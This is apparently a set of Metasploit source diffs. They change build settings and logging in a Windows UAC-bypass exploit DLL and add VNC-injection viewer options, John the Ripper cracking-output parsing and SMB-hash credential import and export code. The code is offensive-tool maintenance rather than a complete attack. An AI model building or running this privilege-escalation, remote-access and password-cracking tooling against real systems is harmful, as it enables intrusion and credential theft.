|
||||||
if (ERROR_NO_MORE_FILES != dwErr)
|
if ((ERROR_NO_MORE_FILES == dwErr) && !(mapProcs.empty()))
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Process32Next/First failed");
|
|
||||||
}
|
|
||||||
else if (mapProcs.empty())
|
|
||||||
{
|
|
||||||
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
|
||||||
CLogger::LogLine(L"Process32Next/First returned nothing");
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
{
|
||||||
bResult = true;
|
bResult = true;
|
||||||
}
|
}
|
||||||
|
@ -107,7 +96,6 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
|
||||||
if (szProcName == NULL)
|
if (szProcName == NULL)
|
||||||
{
|
{
|
||||||
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(L"No process name passed in");
|
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -140,7 +128,7 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
|
||||||
}
|
}
|
||||||
|
|
||||||
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||||
CLogger::LogLine(strMsg);
|
|
||||||
|
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -64,25 +68,30 @@
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>true</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>true</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -90,11 +99,16 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -102,11 +116,16 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -117,6 +136,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
|
@ -124,6 +144,9 @@
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -134,6 +157,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
|
@ -145,6 +169,9 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="stdafx.h" />
|
<ClInclude Include="stdafx.h" />
|
||||||
|
|
3
external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp
vendored
Normal file → Executable file
3
external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp
vendored
Normal file → Executable file
|
@ -17,7 +17,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
|
||||||
// Wee need to hide fact that we've started process thats why we immediately
|
// Wee need to hide fact that we've started process thats why we immediately
|
||||||
// Terminate host application.
|
// Terminate host application.
|
||||||
//
|
//
|
||||||
CLogger::LogLine(TEXT("DLL: Hello"));
|
|
||||||
|
|
||||||
switch (ul_reason_for_call)
|
switch (ul_reason_for_call)
|
||||||
{
|
{
|
||||||
|
@ -33,8 +32,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
|
||||||
startupInfo.cb = sizeof(startupInfo);
|
startupInfo.cb = sizeof(startupInfo);
|
||||||
PROCESS_INFORMATION processInfo = {0};
|
PROCESS_INFORMATION processInfo = {0};
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("DLL: TIOR shell="));
|
|
||||||
CLogger::LogLine(cmd);
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// Create not visible window
|
// Create not visible window
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\Win7Elevate.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building bypassuac x86" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="Building bypassuac x64" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
|
|
|
@ -48,7 +48,14 @@ IF "%ERRORLEVEL%"=="0" (
|
||||||
)
|
)
|
||||||
|
|
||||||
IF "%ERRORLEVEL%"=="0" (
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
ECHO "Building bypassuac_injection"
|
ECHO "Building bypassuac (on-disk)"
|
||||||
|
PUSHD bypassuac
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
)
|
||||||
|
|
||||||
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
|
ECHO "Building bypassuac (in-memory)"
|
||||||
PUSHD bypassuac_injection
|
PUSHD bypassuac_injection
|
||||||
msbuild.exe make.msbuild /target:%PLAT%
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
POPD
|
POPD
|
||||||
|
|
|
@ -152,14 +152,18 @@ class VncInject
|
||||||
# Note that this says nothing about whether it worked, only that we found
|
# Note that this says nothing about whether it worked, only that we found
|
||||||
# the file.
|
# the file.
|
||||||
#
|
#
|
||||||
def autovnc
|
def autovnc(viewonly=true)
|
||||||
vnc =
|
vnc =
|
||||||
Rex::FileUtils::find_full_path('vncviewer') ||
|
Rex::FileUtils::find_full_path('vncviewer') ||
|
||||||
Rex::FileUtils::find_full_path('vncviewer.exe')
|
Rex::FileUtils::find_full_path('vncviewer.exe')
|
||||||
|
|
||||||
if (vnc)
|
if (vnc)
|
||||||
|
args = []
|
||||||
|
args.push '-viewonly' if viewonly
|
||||||
|
args.push "#{vlhost}::#{vlport}"
|
||||||
|
|
||||||
self.view = framework.threads.spawn("VncViewerWrapper", false) {
|
self.view = framework.threads.spawn("VncViewerWrapper", false) {
|
||||||
system("vncviewer #{vlhost}::#{vlport}")
|
system(vnc, *args)
|
||||||
}
|
}
|
||||||
|
|
||||||
return true
|
return true
|
||||||
|
|
|
@ -22,6 +22,18 @@ module VncInjectOptions
|
||||||
"The local host to use for the VNC proxy",
|
"The local host to use for the VNC proxy",
|
||||||
'127.0.0.1'
|
'127.0.0.1'
|
||||||
]),
|
]),
|
||||||
|
OptBool.new('DisableCourtesyShell',
|
||||||
|
[
|
||||||
|
false,
|
||||||
|
"Disables the Metasploit Courtesy shell",
|
||||||
|
true
|
||||||
|
]),
|
||||||
|
OptBool.new('ViewOnly',
|
||||||
|
[
|
||||||
|
false,
|
||||||
|
"Runs the viewer in view mode",
|
||||||
|
true
|
||||||
|
]),
|
||||||
OptBool.new('AUTOVNC',
|
OptBool.new('AUTOVNC',
|
||||||
[
|
[
|
||||||
true,
|
true,
|
||||||
|
@ -32,12 +44,6 @@ module VncInjectOptions
|
||||||
|
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptBool.new('DisableCourtesyShell',
|
|
||||||
[
|
|
||||||
false,
|
|
||||||
"Disables the Metasploit Courtesy shell",
|
|
||||||
false
|
|
||||||
]),
|
|
||||||
OptBool.new('DisableSessionTracking',
|
OptBool.new('DisableSessionTracking',
|
||||||
[
|
[
|
||||||
false,
|
false,
|
||||||
|
@ -79,7 +85,7 @@ module VncInjectOptions
|
||||||
|
|
||||||
# If the AUTOVNC flag is set, launch VNC viewer.
|
# If the AUTOVNC flag is set, launch VNC viewer.
|
||||||
if (datastore['AUTOVNC'] == true)
|
if (datastore['AUTOVNC'] == true)
|
||||||
if (session.autovnc)
|
if (session.autovnc(datastore['ViewOnly']))
|
||||||
print_status("Launched vncviewer.")
|
print_status("Launched vncviewer.")
|
||||||
else
|
else
|
||||||
print_error("Failed to launch vncviewer. Is it installed and in your path?")
|
print_error("Failed to launch vncviewer. Is it installed and in your path?")
|
||||||
|
|
|
@ -135,14 +135,21 @@ module Auxiliary::JohnTheRipper
|
||||||
|
|
||||||
::IO.popen(cmd, "rb") do |fd|
|
::IO.popen(cmd, "rb") do |fd|
|
||||||
fd.each_line do |line|
|
fd.each_line do |line|
|
||||||
|
line.chomp!
|
||||||
print_status(line)
|
print_status(line)
|
||||||
if line =~ /(\d+) password hash(es)* cracked, (\d+) left/m
|
if line =~ /(\d+) password hash(es)* cracked, (\d+) left/m
|
||||||
res[:cracked] = $1.to_i
|
res[:cracked] = $1.to_i
|
||||||
res[:uncracked] = $2.to_i
|
res[:uncracked] = $2.to_i
|
||||||
end
|
end
|
||||||
|
|
||||||
bits = line.split(':')
|
bits = line.split(':', -1)
|
||||||
|
|
||||||
|
# If the password had : characters in it, put them back together
|
||||||
|
while bits.length > 7
|
||||||
|
bits[1,2] = bits[1,2].join(":")
|
||||||
|
end
|
||||||
next if not bits[2]
|
next if not bits[2]
|
||||||
|
|
||||||
if (format== 'lm' or format == 'nt')
|
if (format== 'lm' or format == 'nt')
|
||||||
res[ :users ][ bits[0] ] = bits[1]
|
res[ :users ][ bits[0] ] = bits[1]
|
||||||
else
|
else
|
||||||
|
@ -201,7 +208,14 @@ module Auxiliary::JohnTheRipper
|
||||||
end
|
end
|
||||||
|
|
||||||
def john_wordlist_path
|
def john_wordlist_path
|
||||||
::File.join(john_base_path, "wordlists", "password.lst")
|
# We ship it under wordlists/
|
||||||
|
path = ::File.join(john_base_path, "wordlists", "password.lst")
|
||||||
|
# magnumripper/JohnTheRipper repo keeps it under run/
|
||||||
|
unless ::File.file? path
|
||||||
|
path = ::File.join(john_base_path, "run", "password.lst")
|
||||||
|
end
|
||||||
|
|
||||||
|
path
|
||||||
end
|
end
|
||||||
|
|
||||||
def john_binary_path
|
def john_binary_path
|
||||||
|
@ -209,6 +223,7 @@ module Auxiliary::JohnTheRipper
|
||||||
if datastore['JOHN_PATH'] and ::File.file?(datastore['JOHN_PATH'])
|
if datastore['JOHN_PATH'] and ::File.file?(datastore['JOHN_PATH'])
|
||||||
path = datastore['JOHN_PATH']
|
path = datastore['JOHN_PATH']
|
||||||
::FileUtils.chmod(0755, path) rescue nil
|
::FileUtils.chmod(0755, path) rescue nil
|
||||||
|
return path
|
||||||
end
|
end
|
||||||
|
|
||||||
if not @run_path
|
if not @run_path
|
||||||
|
|
|
@ -1547,9 +1547,9 @@ class DBManager
|
||||||
|
|
||||||
ret = {}
|
ret = {}
|
||||||
|
|
||||||
#Check to see if the creds already exist. We look also for a downcased username with the
|
# Check to see if the creds already exist. We look also for a downcased username with the
|
||||||
#same password because we can fairly safely assume they are not in fact two seperate creds.
|
# same password because we can fairly safely assume they are not in fact two seperate creds.
|
||||||
#this allows us to hedge against duplication of creds in the DB.
|
# this allows us to hedge against duplication of creds in the DB.
|
||||||
|
|
||||||
if duplicate_ok
|
if duplicate_ok
|
||||||
# If duplicate usernames are okay, find by both user and password (allows
|
# If duplicate usernames are okay, find by both user and password (allows
|
||||||
|
@ -3171,7 +3171,7 @@ class DBManager
|
||||||
data = ""
|
data = ""
|
||||||
::File.open(filename, 'rb') do |f|
|
::File.open(filename, 'rb') do |f|
|
||||||
data = f.read(f.stat.size)
|
data = f.read(f.stat.size)
|
||||||
end
|
end
|
||||||
import_wapiti_xml(args.merge(:data => data))
|
import_wapiti_xml(args.merge(:data => data))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -3487,16 +3487,29 @@ class DBManager
|
||||||
sname = $6
|
sname = $6
|
||||||
end
|
end
|
||||||
when /^[\s]*Warning:/
|
when /^[\s]*Warning:/
|
||||||
next # Discard warning messages.
|
# Discard warning messages.
|
||||||
when /^[\s]*([^\s:]+):[0-9]+:([A-Fa-f0-9]+:[A-Fa-f0-9]+):[^\s]*$/ # SMB Hash
|
next
|
||||||
|
|
||||||
|
# SMB Hash
|
||||||
|
when /^[\s]*([^\s:]+):[0-9]+:([A-Fa-f0-9]+:[A-Fa-f0-9]+):[^\s]*$/
|
||||||
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
||||||
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
|
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
|
||||||
ptype = "smb_hash"
|
ptype = "smb_hash"
|
||||||
when /^[\s]*([^\s:]+):([0-9]+):NO PASSWORD\*+:NO PASSWORD\*+[^\s]*$/ # SMB Hash
|
|
||||||
|
# SMB Hash
|
||||||
|
when /^[\s]*([^\s:]+):([0-9]+):NO PASSWORD\*+:NO PASSWORD\*+[^\s]*$/
|
||||||
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
||||||
pass = ""
|
pass = ""
|
||||||
ptype = "smb_hash"
|
ptype = "smb_hash"
|
||||||
when /^[\s]*([\x21-\x7f]+)[\s]+([\x21-\x7f]+)?/n # Must be a user pass
|
|
||||||
|
# SMB Hash with cracked plaintext, or just plain old plaintext
|
||||||
|
when /^[\s]*([^\s:]+):(.+):[A-Fa-f0-9]*:[A-Fa-f0-9]*:::$/
|
||||||
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
||||||
|
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
|
||||||
|
ptype = "password"
|
||||||
|
|
||||||
|
# Must be a user pass
|
||||||
|
when /^[\s]*([\x21-\x7f]+)[\s]+([\x21-\x7f]+)?/n
|
||||||
user = ([nil, "<BLANK>"].include?($1)) ? "" : dehex($1)
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : dehex($1)
|
||||||
pass = ([nil, "<BLANK>"].include?($2)) ? "" : dehex($2)
|
pass = ([nil, "<BLANK>"].include?($2)) ? "" : dehex($2)
|
||||||
ptype = "password"
|
ptype = "password"
|
||||||
|
|
|
@ -149,11 +149,11 @@ class Export
|
||||||
report_file.puts "Warning: could not read the private key '#{c.pass}'."
|
report_file.puts "Warning: could not read the private key '#{c.pass}'."
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
else "text"
|
when "text"
|
||||||
data.each do |c|
|
data.each do |c|
|
||||||
user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.user, true)
|
user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.user, true)
|
||||||
pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.pass, true)
|
pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.pass, true)
|
||||||
report_file.write "%s %s\n" % [user,pass]
|
report_file.write "%s:%s:::\n" % [user,pass]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
report_file.flush
|
report_file.flush
|
||||||
|
@ -372,7 +372,7 @@ class Export
|
||||||
def extract_module_detail_info(report_file)
|
def extract_module_detail_info(report_file)
|
||||||
Mdm::Module::Detail.all.each do |m|
|
Mdm::Module::Detail.all.each do |m|
|
||||||
report_file.write("<module_detail>\n")
|
report_file.write("<module_detail>\n")
|
||||||
m_id = m.attributes["id"]
|
#m_id = m.attributes["id"]
|
||||||
|
|
||||||
# Module attributes
|
# Module attributes
|
||||||
m.attributes.each_pair do |k,v|
|
m.attributes.each_pair do |k,v|
|
||||||
|
|
|
@ -139,8 +139,10 @@ protected
|
||||||
|
|
||||||
# Prefer the target's platform/architecture information, but use
|
# Prefer the target's platform/architecture information, but use
|
||||||
# the module's if no target specific information exists
|
# the module's if no target specific information exists
|
||||||
|
opts[:platform] ||= payload_instance.platform if self.respond_to? :payload_instance
|
||||||
opts[:platform] ||= target_platform if self.respond_to? :target_platform
|
opts[:platform] ||= target_platform if self.respond_to? :target_platform
|
||||||
opts[:platform] ||= platform if self.respond_to? :platform
|
opts[:platform] ||= platform if self.respond_to? :platform
|
||||||
|
opts[:arch] ||= payload_instance.arch if self.respond_to? :payload_instance
|
||||||
opts[:arch] ||= target_arch if self.respond_to? :target_arch
|
opts[:arch] ||= target_arch if self.respond_to? :target_arch
|
||||||
opts[:arch] ||= arch if self.respond_to? :arch
|
opts[:arch] ||= arch if self.respond_to? :arch
|
||||||
end
|
end
|
||||||
|
|
|
@ -42,6 +42,8 @@ module Msf::Payload::Java
|
||||||
#
|
#
|
||||||
# @option opts :main_class [String] the name of the Main-Class
|
# @option opts :main_class [String] the name of the Main-Class
|
||||||
# attribute in the manifest. Defaults to "metasploit.Payload"
|
# attribute in the manifest. Defaults to "metasploit.Payload"
|
||||||
|
# @option opts :random [Boolean] Set to `true` to randomize the
|
||||||
|
# "metasploit" package name.
|
||||||
# @return [Rex::Zip::Jar]
